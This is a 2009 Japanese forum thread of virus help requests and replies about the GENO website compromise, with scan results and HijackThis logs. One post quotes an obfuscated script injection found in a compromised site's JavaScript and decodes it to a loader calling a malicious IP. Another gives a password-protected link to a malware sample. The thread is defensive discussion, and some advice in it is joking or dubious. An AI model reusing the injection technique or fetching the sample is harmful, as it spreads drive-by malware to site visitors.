【ウィルス情報質問　総合スレッド★Part46】

【使用OS】　Windows　vista　home
【Microsoft Update（MU）の状態】　有り
【使用セキュリティソフトとバージョン】　カスペルスキー7.0
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】　されている
【スパイウェア対策ソフト】　スパイボット　ADware
【スパイウェア対策ソフトの更新は定期的に行なっているか】　行っている
【ルータの有無】　有り

【スキャンの結果何が検出されたか（検出されたウイルス名・ファイル名を（パスを含めて）詳しく）】

ただいまスキャン中なのでスキャンの結果ではないのですが、あるHPに行こうとしたら
「脅威を検知しました」が出ました。
警告により拒否はしたのでレポート上では"安全になったオブジェクト"になっています。

検知したものは「trojan-Downloader.JS.Agent.dwf」　URLは　ｔ　ｔ　ｐ　：　/　/　94.247.2.195/jquery.js

経緯としては、研音（芸能事務所）のK-shopというグッズ販売の水嶋ヒロさんのページのところから
菅野美穂さんがキイナで使ったネックレスというjuicyrockのバナーをクリックしたら検知が出ました。
誤検知なのか本当にトロイなのかわからないのですがいかがでしょうか。
http://www.ken-on.co.jp/k-shop/2009/03/post_67.html
K-shopのトップページにも同じバナーはあります。

上の方で話題になってるGenoだね

>689
Acrobatなし
Flashあり（最新版）
ブラウザIE（セキュリティ高）
アドオン無効
制限付きユーザー

>690
問題になってるgenoウイルスだね。
とりあえずカスペなら対応済みのようなので、念の為スキャンしてみましょう。

>>690です。レスありがとうございます。
このページで買い物するつもりはないのですが残念な目にあってしまいましたorz
拒否が有効でなにも検出されなければ、他の安全なサイトでのショッピングなどは問題ないでしょうか。
たまに買い物はするので…。あと70%ほどのスキャンが終わったらまた参ります。

>694
WindowsUpdateとAcrobatとFlashが最新版なら大丈夫。
それでも心配ならリカバリするのが最も良い対策と言えるでしょう。

>>695　JavaスクリプトONにしてアボート、94.247.2.195と通信していたら時既に手遅れ

>>690です。

>>695
スキャン終わりました。検出なしです。
>>696
すいませんがそこと通信しているかどうか確かめる方法はありますか？

>696
リアルタイムで検知して拒否したので、94.247.2.195とは通信してないと思われます。

94.247.2.195も踏んで来たけど、『Search the Web：』ってもしかしてCoolWebSearchなのか？

>697
検出なし、了解です。

通信なら、スタート→検索欄に「cmd.exe」と入力してEnter
コマンドプロンプトの画面で、「netstat -an」と入力してEnter
94.247.2.195と通信してればアウト
たぶん大丈夫だと思いますが…。

>>696

690のケースはｶｽﾍﾟで検知(遮断)されている前提

>>690です。アドバイス感謝いたします。
コマンドプロンプトにて「netstat -an」を実行しました。

94.247.2.195との通信履歴はありませんでした。実行すると"アクティブな接続"と表示されますが、
すでになんらかの通信が終わった後だったため（０時36分の出来事だったため）
に通信が表示されなかったということもあり得るのでしょうか。
考えなくてよいのならば、その後の詳細の発表を待ちたいと思います。

>701
じゃあ、今はとりあえず様子見…後日KVRTを使ってチェックしてみるとか。

ちなみに、タスクマネージャにconime.exeがあったらアウトってレスがあると思いますが、
コマンドプロンプトを起動させれば、自動的にconime.exeも起動するようになってますので。
またコマンドプロンプトを閉じても、conime.exeが残るのは使用ですから。

OSはVistaです。
システムのプロパティを開いて、詳細設定タブを開き、パフォーマンスの設定を開き、
パフォーマンスオプションのデータ実行防止タブを開くと、選択するウィンドウが出ます。
『次に選択するのものを除く〜…有効にする』を選択すると、アンインストールしたソフトの項目がありました。
これを何回削除しても、復活しちゃうんです。。ちなみにDVDFabというソフトです。。
ソフトに関係するレジストリも削除済みです。
何か、ウィルスやその他の脅威の可能性はありますでしょうか？

951 名前：名無しさん[sage] 投稿日：2009/04/06(月) 01:34:39 0
OSはVistaです。
システムのプロパティを開いて、詳細設定タブを開き、パフォーマンスの設定を開き、
パフォーマンスオプションのデータ実行防止タブを開くと、選択するウィンドウが出ます。
『次に選択するのものを除く〜？有効にする』を選択すると、アンインストールしたソフトの項目がありました。
これを何回削除しても、復活しちゃうんです。。ちなみにDVDFabというソフトです。。
関係するレジストリも削除済みです。
この項目が出ないようにする方法知ってる方いたら、教えて下さい。
何回やっても出てきて気持ち悪くて。。

Vista 一般ユーザー(管理者権限は持ってない)
IE7 保護モード

これでだいたいの奴は踏んでも怖くない

Windows　Updateとウィルス定義を最新にしとけば大丈夫なんじゃないの？

「ウイルス対策ソフトのパターンファイルが最新であったにもかかわらず，
職員のWeb閲覧でPE_MUMAWOW.AJ-Oに感染，システムが
利用不能に。Windows Update＋ウイルス対策ソフトでは対策にならない例。」

どうして対策できなかったの？

>>706

>Windows Update

Windows の脆弱性をつく攻撃ではなかった
もしくは
ゼロデイ攻撃が行われており、まだパッチがなかった

>ウイルス対策ソフト

ウイルス対策ソフトがまだ対応していないウイルスだった

教えてください。

avastをインスコ　バージョン4.8.1335.0
手動でUPDATEして
VPSの現在のバージョン　090406-0、04/06
この状態でスキャン完了。50分くらいかかったが何も検出されず

これで一応は　GENOウィルス大丈夫ってことで良いのでしょうか？？？？？？？？

【使用OS】　「windows xp sp3」
【Microsoft Update（MU）の状態】　「不明」 ←試みたが繋がらなかった
【使用セキュリティソフトとバージョン】　「zone alarm」 「avast」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】　「したつもり」
【スパイウェア対策ソフト】　「無し」
【スパイウェア対策ソフトの更新は定期的に行なっているか】　「無し」
【ルータの有無】　「あり」
【スキャンの結果】 「何も検出されず」」

これからMicrosoft Update試みてみます。

0-day攻撃でやられた、もしくはパッチ未適用でやられた場合でも大丈夫なように、
Vista+IE7で、保護モード使ってるな

>708
GENOウイルス関連サイト踏んだの？
geno-webに飛ばす短縮URLを間違えてクリックしてしまったとか？

>>710
はい、ＳＤカード欲しくて、色んなサイト物色してたもんで
思いっきりＧＥＮＯ本体見てましたｏｒｚ....
何時見たのかが記憶にないので
色々不安になってしまいまして

検出されなけれ大丈夫ですよねぇ？？

ひとつ気になるのはこれを踏んだあとか前かはわからんがアマゾンでクレカ決済しているんだよなあ・・・
httpsって飾りですかね。

>711
そういう時は履歴を見れば良いんですよ。
該当するサイト名を右クリック→プロパティ
最終表示日時を見れば、いつ踏んだか分かりますので。

いや、あなた質問する時にこう言いましたよね？
＞【Microsoft Update（MU）の状態】　「不明」 ←試みたが繋がらなかった
って
何度試しても時間を置いて試してもそれでも繋がらない、となると可能性はあります。

MicrosoftUpdateできました？

>>713
ｆｉｒｅｆｏｘで見てたんですが
なんか調子悪いんで真っ先にアンインストールしてしまってて・・・・
履歴って残ってるもんなんでしょうか？？？

マジMicrosoft Updateが繋がりませんしたｏｒｚ
なんかもう疲れたんでｏｒｚ
当該ＰＣは電源落として明日また挑戦してみます

>>714
UpdateはIEでやるべきじゃね？

>714
俺Firefox使ってないから断定はできないけど、消えちゃうんじゃないでしょうか…。

電源落す前に、HijackThisのログをどこかのうｐろだへ“パス付きで”上げて貰えないでしょうか？

>>708と◆N9P3SuvBPo
・Winコントロールパネル＞管理ツール＞サービス
＞「Avast関連のサービス」と「Automatic Updates」がちゃんと動いてるかを確認（駆除後も確認必要）
・Winコントロールパネル＞セキュリティセンターの「自動更新」も確認（駆除後も確認必要）

Genoのウイルスはコレ
ttp://www.virustotal.com/analisis/48cfd289b06a1fb46dfbcb9fc8bad17a
File 8lv.exe received on 04.03.2009 18:36:21 (CET)
Avast ・・・ Win32:Daonol-L

「a-squared Free 4.0」 をダウンロード
ttp://www.emsisoft.jp/jp/software/free/
＞手動Updateする
＞「ディープスキャン」を選択実行して検出を試みる、
（※スキャン終了後に「ログ保存」にボタンをクリックして都合のいい場所にテキスト保存、
あとでAvastへ提出しておく）＞a-squared Freeでそのまま駆除

複数仕掛けられてた模様・・・
このサイト踏みたくなかったんで、Symantecへは別件提出しといたから対応してくれたんだろう

GENOなどのサイトでウイルス感染★6
GmL.exe 受理 2009.04.06 18:04:43 (CET)
ttp://www.virustotal.com/jp/analisis/d2ab3fb2e35d6cc5aaae32e7230a4646
La.zip 受理 2009.04.06 18:32:46 (CET)
ttp://www.virustotal.com/jp/analisis/3dda094319cd06b1fc0175bdaf516e44
パックされたDropper型、McAfeeやSymantecは対応済みらしい

>717
俺、Avast入れてないし、自動更新だって無効に設定してますけど？

電源落すって言ってたけど、環境によってはブルスクになるってあったからな…

KillAVだからね・・・（セキュリティソフトやMicrosoft Updateを停める）

a-squaredよりもこっちのほうが良かったかな?
マカフィー・インターネットセキュリティ 2009体験版
ttps://www.storemcafee.jp/mcfs/catalog/campaign_products.php?campaign_id=55&osCsid=iffvt7a7r0h2le5115blm0ctsdtvm8j6
Avastと一時的な共存なら問題無いから（駆除後にマカフィーアンインストール）体験版使う方がいいかもね

検出箇所と検出名は◆N9P3SuvBPoに教えてあげてねｗ

>>720
すんません詳しくありがとうございまする
色々慣れないもので・・・・

流れとしては
ＰＣが重くなる→ＡＶＧ（前から入ってたが自動ＵＰＤＡＴＥ不能に）→たまたまＧＥＮＯウイルスの存在を知る
怖くなってＡＶＧ削除→ａｖａｓｔは対応してる？らしいのでインスコ→これも自動ＵＰＤＡＴＥできず・・・→手動で>>708の状態まで辿り着く
あれ？Microsoft Updateできないや・・・・・→また不安にｏｒｚ

明日マカフィー入れてスキャンしてみます。
ありがとうございました。

>721
自動更新やBITSが有効でもね、書き換えられていたらENDだよ。
HijackThisすらもDLできないのか…となると残る選択肢はリカバリしか…

>>721
自動UPDATEできないのならアウトだと思う

【使用OS】　「windows xp sp3」
【使用セキュリティソフトとバージョン】　「ノートン2008」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】　「年明けで期限切れ」

スキャンで反応が無かったので開こうと思ったらexe・・・
exeのあるフォルダにexeと同じ名前のフォルダを作ってましたが、
他にどんな動作をしているものなのでしょうか？

＊ウイルス注意＊

http://www1.axfc.net/uploader/H/so/74041 pass[2ch]

>>724
おもいっきりクロだった。あとは自分で調べれ
File: exe.exe
Status:
INFECTED/MALWARE
MD5: 6da1bd47cfcdb0de1804ba3d193bdee1
Packers detected:
-
↓各スキャナの結果。未検出だったとこは割愛
Scan taken on 07 Apr 2009 05:45:28 (GMT)
AntiVir
Found 　TR/Dropper.Gen
Avast
Found 　Win32:SdBot-gen44
CPsecure
Found 　Troj.Exploit.W32.IMG-WMF.da
Ikarus
Found Virus.Win32.SdBot.gen44
Sophos Antivirus
Found Mal/Behav-043
よくわからんけど他の不正プログラムを落とすマルウェアみたい

【使用OS】　「Windows 2000」
【Microsoft Update（MU）の状態】　「SP4適用のみ」
【使用セキュリティソフトとバージョン】　「Avira」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】　「はい」
【スパイウェア対策ソフト】　「a-squared Free 4.0」
【スパイウェア対策ソフトの更新は定期的に行なっているか】　「はい」
【ルータの有無】　「あり」

【スキャンの結果何が検出されたか（検出されたウイルス名・ファイル名を（パスを含めて）詳しく）】
「Aviraとa-squared Free 4.0でスキャンしたが何も検出されない」

GENOのサイトへアクセスしたとき、いつもよりページが開くのが遅く、重かったので直ぐに他のページを
開きました。時間を空けてGENOに再びアクセスしたところ、よく覚えていないのですがメッセージの画面が
出て内容も全部読まずに「はい」をクリックしました。
アドビ関係は偶然にも3月の17日に最新版をダウンロードしてインストールしています。
いろんなページに書き込まれていて怖くなりどうすればいいのかわかりません。

ブラウザはファイアフォックスで再起動してみましたが、何ともありませんでした。

【使用OS】　「windows xp sp3」
【使用セキュリティソフトとバージョン】「AVG」
【スキャンの結果何が検出されたか（検出されたウイルス名・ファイル名を（パスを含めて）詳しく）】
AVGでは何も検出され
F-Secureでオンラインスキャナしたら
W32/Packed_RPack.Fってのが検出されたんだけど
ググッても情報が何も出てこないんですけど
どなたか情報をください。

>727
最新版のadobe製品を適用済みとのことなので、そこは大丈夫だと思います。
しかし、メッセージに対して「はい」をクリックしたのは少しひっかかりますけど…

>728
たしかに情報ありませんね。
名前削ったりしてもヒットせず。
検出場所分かります？
あと、もしかしてGENOを踏んでしまったとか？

>>729
ありがとうございます
メッセージは日本語でバックがグレーでした
飛ばし読みですが意味は新しいバージョンがどうのこうのとかいう内容だった
ような気がします。
プロセスエクスプローラなどでも確認しましたが、怪しいものはありませんでした。
ブラウザでアクセスしたときに左下のURLを確認していましたが、見慣れない
アドレスが出ていましたが、飛ばされることはありませんでした。

このまま様子見で大丈夫でしょうか

>730
http://lapcie.com/index.php?page=AsukaTime
ここのサイトのAsukaTime

Ver 1.0.28 Download
ってやつのexeから検出されたんですけど
わかりますかね？

【使用OS】　「Windows XP Pro」
【Microsoft Update（MU）の状態】　「自動　下記が未インストール」
Windows Genuine Advantage (正規 Windows 推奨プログラム) 通知ツール (KB905474)
Microsoft .NET Framework 3.5 Service Pack 1 および .NET Framework 3.5 ファミリ更新プログラム (KB951847) x86

【使用セキュリティソフトとバージョン】　「ウィルスバスター 2008」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】　「最新」
プログラムのバージョン 16.10.1207
検索エンジンのバージョン 8.911.1001a
【スパイウェア対策ソフトの更新は定期的に行なっているか】　「同上」
【ルータの有無】　「BBルータ有り」

【スキャンの結果何が検出されたか（検出されたウイルス名・ファイル名を（パスを含めて）詳しく）】
「TROJ_GENOME.BK　popup[1].js」

geno騒ぎを聞いたのでチェックしたところ上記がでてきました。

ちなみにIEの履歴には 94.***.***.*** は無し
下記のアクセス履歴が残ってました。
　ttp://www.geno-web.jp/Goods/GB09001900
　最終表示日時　2009/03/31

ウイルスに感染していますか？　acrobatreadは8.1.2なので古いです。

パターンファイル部書き忘れました
よろしくお願いします。

【セキュリティソフトの定義ファイルは最新の状態に更新されているか】　「最新」
プログラムのバージョン 16.10.1207
検索エンジンのバージョン 8.911.1001
パターンファイル番号 5.949.00

>731
＞日本語でグレー
＞新しいバージョン
これってもしや、AcrobatもしくはFlashのアップデート通知？
でもAdobe製品が最新ならそんなメッセージが出ないのが普通なんですが…

念の為、HijackThisというツールを落してきて、ログを取って、適当なアップローダーに、
“パス付きで”アップしてれませんか。
HijackThisのダウンロード
↓
ttp://wiki.higaitaisaku.com/wiki.cgi?page=HijackThis+%A5%C0%A5%A6%A5%F3%A5%ED%A1%BC%A5%C9+%28+Trend+Micro+%29

>732
AsukaTime.exeか…
いちおうそのファイルを、VirusTotalでスキャンして、
結果のURLを貼ってくれませんか。

>733
先に聞きますが、SP2かSP3は当ててますよね？

＞最終表示日時　2009/03/31
GENOが問題のサイトになってると報告されたのが、4月4日らしいので、
その日以前にアクセスしたということだったら、たぶん大丈夫でしょう。
IEのキャッシュのクリアとクッキーのクリアを行なってください。

>>736
WinXP Pro SP3です
キャッシュのクリアとクッキーのクリアを行います。
念のため、いくつかのオンラインウィルススキャンをやってみます。
ありがとうございました。

>735
検索してみました〜これでおｋですかね？
http://www.virustotal.com/jp/analisis/66fdd1049d0606e8a08c277e48b77ca1

>737
了解です。

>738
うはwwwwwwwwウイルス名から推測するにかなり厄介なタイプと見た。
有名な所もふくめていくつかのベンダーも検知してるので、誤検出の可能性は低いと見た。
素性が全くわからない相手なので（もし分かってたとしても駆除は難しいと思う）、
リカバリをお奨めします。

>739
わかりました〜
ありがとうございました〜

>>736
便利そうなものなので　こちら（popup.js）もアップしました。
どうも誤検知っぽいですね。

http://www.virustotal.com/jp/analisis/43eb74ec2421691d1e80b9ed4d3cefdb

>741
はい、こちらは誤検出です。
トレンドが「誤検出だ」と訂正してました。

>>741
パターンファイルは最新っぽいから
訂正し切れなかったものかと思われます。

test

あと1時間起きていられるか分かりません…

>>732
AsukaTime.exe 動かしたが何も落ちてこない。ﾂﾏﾝﾈ
Bit の Peed.Gen の説明見たが、該当箇所のレジストリも改変されてないし、
ファイルのコピーもできてない。ﾓｯﾄﾂﾏﾝﾈ
ttp://www.threatexpert.com/report.aspx?md5=c534ea1d81c337959b39524c0d883c46

>>739
ttp://www.virustotal.com/jp/analisis/7d246f0103dc3111c70dc17bc9bf5322
アンパックしたら減った。パッカで検出してんじゃね？

>747
そうだろうか？
もし、>>738の結果が誤検出なら多過ぎだと思うんですがね…

>>738 >>747 の差分

パッカー(6)とヒューリスティック(4)と Peed.Gen(2)
Peed.Genは改変、ドロップなし報告あり。

AhnLab-V3　5.0.0.2　2009.04.07　　Win32/MalPackedB.suspicious
Authentium　5.1.2.4　2009.04.07　　W32/Heuristic-210!Eldorado
BitDefender　7.2　　　2009.04.07　　Trojan.Peed.Gen
F-Prot　　　4.4.4.56　　2009.04.07　　W32/Heuristic-210!Eldorado
GData　　　19　　　　2009.04.07　　Trojan.Peed.Gen
Norman　　　6.00.06　　2009.04.07　　W32/Packed_RLPack.F
Panda　　　10.0.0.14　2009.04.06　　Malicious　Packer
Prevx1　　　V2　　　　2009.04.07　　High　Risk　Cloaked　Malware
Sophos　　　4.40.0　　2009.04.07　　Sus/ComPack-F
Sunbelt　　　3.2.1858.2　2009.04.06　　Trojan.Win32.Packer.RLPack1.18.a　(v)
Symantec　1.4.4.12　2009.04.07　　Suspicious.MH690.A
VirusBuster　4.6.5.0　　2009.04.06　　Packed/RLPack

まぁ、心配なら使わないことだな。

今日のところはこれで失礼させてもらいますね。

>>746
>>747
>>748
>>749
ご丁寧にいろいろとありがとうございました。
パッカで検出をしていました
お手数おかけしてすいませんでした〜

778 名前： アブラチャン(アラバマ州)[sage] 投稿日：2009/04/08(水) 01:20:59.53 ID:cD+rmH6W
ここもか？

www.naxos.co.jp/_ScriptLibrary/pm.js
最下部
<!--
document.write(unescape('%3CspBscjBrjBispBppHtjB%20srCXHcjB%3DspB%2FpH%2FjB94%2Eze6243y7%2E23y%2E195%2F3yjqze6uerspByCXH%2Ejsze6%3E%3C%2F3ysc3yript3y%3E').replace(/3y|CW|jB|pH|CXH|ze6|spB/g,""));
-->
　　　　　↓
<script src=//94.247.2.195/jquery.js></script>

【使用OS】　「XP」
【使用セキュリティソフトとバージョン】　「avast!4.8」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】　「はい」
【スパイウェア対策ソフト】　「spybot」
【スパイウェア対策ソフトの更新は定期的に行なっているか】　「はい」

【スキャンの結果何が検出されたか（検出されたウイルス名・ファイル名を（パスを含めて）詳しく）】
「検出されませんでした」

タスクバーを見たところ、「wpsupdate.exe」とあり、
最大化してみるとはいといいえのボタンだけで、いいえを押すと消えました
再起動して、タスクバーをみるとやはりありました

当然知らなくて検索してみるとどうやらスパイウェアらしいのです。
怖くなってspybotでスキャンしてみても検出されませんでした
どうすれば良いのでしょうか？

ウィルスドロッパーか
初めてお目にかかった　サンキュー

>>725
ありがとうございます。
久しぶりにクリーンすっかな・・・

>>735
Adobe Reader 9 のバージョンは　9.0.0.332　でした。
ログは
Logfile of Trend Micro HijackThis v2.0.2
Scan saved at 12:25:24, on 2009/04/08
Platform: Windows 2000 SP4 (WinNT 5.00.2195)
MSIE: Internet Explorer v6.00 SP1 (6.00.2800.1106)
Boot mode: Normal

Running processes:
C:\WINNT\System32\smss.exe
C:\WINNT\system32\winlogon.exe
C:\WINNT\system32\services.exe
C:\WINNT\system32\lsass.exe
C:\Program Files\Avira\AntiVir PersonalEdition Classic\sched.exe
C:\Program Files\Avira\AntiVir PersonalEdition Classic\avguard.exe
C:\WINNT\system32\svchost.exe
C:\WINNT\System32\svchost.exe
C:\WINNT\System32\WBEM\WinMgmt.exe
C:\WINNT\Explorer.EXE
C:\Program Files\Avira\AntiVir PersonalEdition Classic\avgnt.exe
C:\Program Files\Mozilla Firefox\firefox.exe
C:\soft\HiJackThis.exe

>>735
O2 - BHO: AcroIEHelperStub - {18DF081C-E8AD-4283-A596-FA578C2EBDC3} - C:\Program Files\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll
O2 - BHO: SSVHelper Class - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files\Java\jre1.6.0_04\bin\ssv.dll
O3 - Toolbar: ラジオ(&R) - {8E718888-423F-11D2-876E-00A0C9082467} - C:\WINNT\System32\msdxm.ocx
O4 - HKLM\..\Run: [Synchronization Manager] mobsync.exe /logon
O4 - HKLM\..\Run: [avgnt] "C:\Program Files\Avira\AntiVir PersonalEdition Classic\avgnt.exe" /min
O4 - HKLM\..\Run: [Persistence] C:\WINNT\system32\igfxpers.exe
O4 - HKLM\..\Run: [Adobe Reader Speed Launcher] "C:\Program Files\Adobe\Reader 9.0\Reader\Reader_sl.exe"
O4 - HKUS\.DEFAULT\..\Run: [Internat.exe] Internat.exe (User 'Default user')
O4 - HKUS\.DEFAULT\..\RunOnce: [^SetupICWDesktop] C:\Program Files\Internet Explorer\Connection Wizard\icwconn1.exe /desktop (User 'Default user')

>>735
O9 - Extra button: (no name) - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Program Files\Java\jre1.6.0_04\bin\ssv.dll
O9 - Extra 'Tools' menuitem: Sun の Java コンソール - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Program Files\Java\jre1.6.0_04\bin\ssv.dll
O9 - Extra button: Related - {c95fe080-8f5d-11d2-a20b-00aa003c157a} - C:\WINNT\web\related.htm
O9 - Extra 'Tools' menuitem: Show &Related Links - {c95fe080-8f5d-11d2-a20b-00aa003c157a} - C:\WINNT\web\related.htm
O16 - DPF: {6414512B-B978-451D-A0D8-FCFDF33E833C} (WUWebControl Class) - http://update.microsoft.com/windowsupdate/v6/V5Controls/en/x86/client/wuweb_site.cab?1208654512154
O23 - Service: a-squared Free Service (a2free) - Emsi Software GmbH - C:\program files\a2 free\a2service.exe
O23 - Service: AntiVir PersonalEdition Classic Scheduler (AntiVirScheduler) - Avira GmbH - C:\Program Files\Avira\AntiVir PersonalEdition Classic\sched.exe
O23 - Service: AntiVir PersonalEdition Classic Guard (AntiVirService) - Avira GmbH - C:\Program Files\Avira\AntiVir PersonalEdition Classic\avguard.exe
O23 - Service: Logical Disk Manager Administrative Service (dmadmin) - VERITAS Software Corp. - C:\WINNT\System32\dmadmin.exe
End of file

GENOのマルウェアってどこもまだ駆除できないの？
フリーセキュリティは最新のものには強いと聞いてたんだけど..
バスターやノートンとかの御三家も無理かな？

無理っす

手動でOK

>>756
ぱっと見、怪しいのは無いけど
Adobe Reader 9.1.0.163
Jre 1.6.0_13
が最新だから入れとけ

GENO ウイルス に一致する日本語のページ 約 42,800 件中 1 - 50 件目 (0.18 秒)
http://www.google.com/search?hl=ja&lr=lang_ja&ie=UTF-8&oe=UTF-8&q=GENO+%E3%82%A6%E3%82%A4%E3%83%AB%E3%82%B9&num=50

GENO ウイルスってAdobe Readerの脆弱性をついてくると聞きました。
ですが、もしAdobe Readerをアンインストールしていた場合はどうなるのでしょうか？

http://pc11.2ch.net/test/read.cgi/sec/1239152979/27

"GENOウイルス"の検索結果 36 件中 1 - 36 件目 (0.14 秒)

GENO ウイルス ニュース検索結果
http://news.google.co.jp/news/search?um=1&ned=jp&hl=ja&q=GENO+%E3%82%A6%E3%82%A4%E3%83%AB%E3%82%B9&cf=all&scoring=n

先日お世話になった>>690です。その節はありがとうございました。
特に変わったことはなかったのですが念のためにリカバリしました。
スッキリしたと思っていたのですが、ユーザー/appdata/local/Temp/ose00000.exe
なるものが気になっています。これだけ2006年10月の日付になっています。
vistaでofficeパーソナルを持っていると付いてくるものなのでしょうか？

ググってみましたが、日本語の情報がなくて一般サイトはしばらく踏む勇気がないので
調べられませんでした。

>>768
office2007なら考えられないこともないそーですが
ご心配ならそのファイルのコピーを作って、
VirusTotalで検査してみてください

>758
ログに感染と見られるものはないですが、一つだけ以下のエントリーをHijackThisでFIXして下さい。

＞O9 - Extra button: Related - {c95fe080-8f5d-11d2-a20b-00aa003c157a} - C:\WINNT\web\related.htm

（HJTには何も無しか…とはいえ大丈夫と判断下しても良いのだろうか…）

>768
リカバリした直後なら、問題なし。

ComboFixを奨めようかと考えていたんですが、この板のGENOウイルススレの11に
こんなカキコがあった。

＞ただComboFixで自動処理するとアカウントにログイン出来なくなる
＞(正規ファイルを悪玉ファイルに上書き→ComboFixが処理？)

アカウントにログイン出来なくなる
このことから、winlogon.exeあるいはuserinit.exeが改ざんされてると思われる。
再起動時のブルースクリーンのエラーメッセージさえ分かれば…
stop : c000021a Unknown Hard Error
とかならwinlogon.exeの修復を行なえば良いのだが。

あと、HJTもRSITでも見つからない
SDFixも駄目
レジストリエディタの起動も阻止

究極のセキュリティ対策


『 キャッシュをクリア（ｻｯ 』
（やったー！ｶｯｺｲｲ!!!）

（￣▽￣ ;）ハァ。。。。

>>771
＞winlogon.exeあるいはuserinit.exe
それ疑って感染前のuserinit、winlogonのMD5取って
感染後と比較しても変わってなかった。

一回ComboFixで処置、再起動でログインできなくなって
回復コンソールでuserinit、kernel32.dll類を復元してみたけど
回復しなかったから別のところに問題があるのかも・・・（いまだにわからん）

>774
そっち疑ってみたんすけど、違うみたいでしたか。
俺の環境では感染しないので分からないのだけど、ニュー速のほうで、
再起動時にブルスクになると書いてあったから、stopエラーかな？
と思ったんだがそれも違うんですよね？

>>775
＞再起動時にブルスクになると書いてあったから
それ初めて知ったｗ
ブルスクはよくわららんですｗ

ちなみに自分の環境じゃGENOウイルスでブルスクになったことはまだない

>776
ブルスクはあくまでもニュー速スレの情報ですし
（ブルスクは環境に寄りけりと言ったところか…）

ログイン出来なくなった時はどんな状態になったんですか？

>>769>>770
どうもありがとうございます。office2007です。
virus　totalにも行ってみたところ結果は0/40（０．００％）とありました。
ただの残骸のようなので普通に削除しようかと思います。

　　　　　　　　　　　　／）
　　　　　　　　　　　／／／）
　　　　　　　　　 ／,.=ﾞ''"／
　　　／　　　　 i f　,.r='"-‐'つ＿＿＿_　　　キャッシュ削除すりゃぁいいんだよ！！
　　/　　　　　 /　　　_,.-‐'~／⌒　　⌒＼
　　　　／　 　,i　　　,二ﾆ⊃（ ●）.　（●）＼
　　　/　 　　ﾉ　　　 ilﾞフ::::::⌒（__人__）⌒::::: ＼
　　　　　　,ｲ｢ﾄ､　　,!,!|　　　　　|r┬-|　　　　　|
　　　　　/　iﾄヾヽ_/ｨ"＼ 　　 　 `ー'´ 　 　 ／

ブルマスク水

>>778
壁紙だけ表示されて即ユーザー選択画面へ・・・

>>782
つまり…
起動→ようこそ画面→デスクトップの表示→ユーザー選択画面ってとこ？
強制的にログオフさせられているって感じのようですが…
それだったらログオンに関係するファイルがやられてる、としか…
でもログオン関係のファイルの修復しても復帰できなかったと言ってましたし、
原因は別だろうね。

ちなみに、俺一度こんな実験をやったことあります。
コンパネ→管理ツール→ローカルセキュリティポリシー
この中のどこかに「ローカル ログオン」というのがあって、
これを無効にして再起動したら、ログオンできなくなってしまい
リカバリーしました。

GENOウイルスの専門掲示板建てました
情報提供にご協力願います。


GENOウイルス被害者の会
http://yy701.60.kg/genovirus/

ボットに感染してるかどうか
サイバークリーンってとこの駆除ツールを実行してみた方がいいんですかね？
OCNからの定期メールで　やってみな　みたいなこと書いてあったんですが・・・

そこはバスター、ゾンビがいるぞｗ

>>786
ゾンビ？
やらない方がいいんですか？

>>785
HDD内の全ファイル名をテキスト化して
つこうたで定評のあるIPAに送信する愉快なツールだぞ、あれは

>>788
まじっすか？
ここで聞いといてよかったです

GENOウイルスやべえな

【0.1】ﾈｯﾄｼｮｯﾌﾟ｢GENO｣等でウイルス感染　業務再開するもGENOｻｲﾄﾞは｢ｷｬｯｼｭ消せ｣とふざけた対応★11
http://tsushima.2ch.net/test/read.cgi/news/1239241638/

【使用OS】　「XPProSP3」
【Microsoft Update（MU）の状態】　「つながりません」
【使用セキュリティソフトとバージョン】　「Norton Internet Security 2009」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】　「はい」
【スパイウェア対策ソフト】　「Ad-Aware SE」
【スパイウェア対策ソフトの更新は定期的に行なっているか】　「はい」
【ルータの有無】　「なし」

どうやらウィルスに感染してしまったようでPCを立ち上げたとき、または一定時間ごとに、
メールを大量に送付してしまいます。

ウィルススキャンをして感染ファイルを削除したため今は収まっていますが、
当初はservices.exeが終了して再起動してしまいました。

今はウィルスは検出されていませんがレジストリが改変されてしまったようで、
メールを大量に送付し続けています。（メールはプロバイダがブロックして送信されていないようです。）

対策をご存知の方がいらっしゃいましたら宜しくお願いします。

>>792
DDS
ttp://www.forospyware.com/sUBs/dds

dds.scr（MS-DOS アプリケーション）をデスクトップにダウンロード
DDSを実行・・・
DDSによるログ抽出が済むまで操作はありません ttp://i39.tinypic.com/slqvly.jpg
ログ抽出走査が完了すると「DDS - How to post the logs（投稿時の注意点）」のダイアログ表示はOKで閉じます
自動的にDDS.txt とAttach.txt の2つがメモ帳で開くので、
ファイル（F）→「名前を付けて保存（A）」でそれぞれのログを保存しておく。（*テキスト名は変更しない）

OTViewIt
ttp://oldtimer.geekstogo.com/OTViewIt.exe

OTViewIt.exeをデスクトップへダウンロード
OTViewItを実行
「Scan All Users」の箇所にチェックを入れてから、「Run Scan」をクリック
ログ抽出走査が終了すると、
「OTViewIt.txt」と「Extra.txt」がメモ帳で表示されて、デスクトップ上にテキストが自動的に保存されています

これらのログテキストを新規フォルダへコピー&貼り付けしてから→フォルダを圧縮
Upload a suspected infected fileへ、[ Report ] - Infection log report （Massmail bot infection. ） 　として送信
http://pc11.2ch.net/test/read.cgi/sec/1239086455/9　の中段

>792
リカバリしてください。
そっちのほうが手間掛からずに済みます。

ファイルに感染するたびにウイルス自体をランダムな
暗号化コードで暗号化するポリモーフィック型の不正プログラム
「PE_VIRUX（バイラックス）」の流通が確認されたと報告。
「PE_VIRUX」は、正規ファイル（exeファイルやscrファイル）に
感染する際に、自身のコードを追加する場所や暗号化の方式・回数を
ランダムに変更するため駆除が困難

ポリモーフィック型って複号化するロジック部分を検出すれば見つかるって
聞いたけど無理なの？
メタモーフィック型なら無理な気がするけど

>>792
[ Report ]の提出が完了したら、オートラン設定を確認する
�@・IPA 情報処理推進機構
　●「外部記憶メディアのセキュリティ対策を再確認しよう！」 USB メモリの利用における対策
ttp://www.ipa.go.jp/security/txt/2008/12outline.html
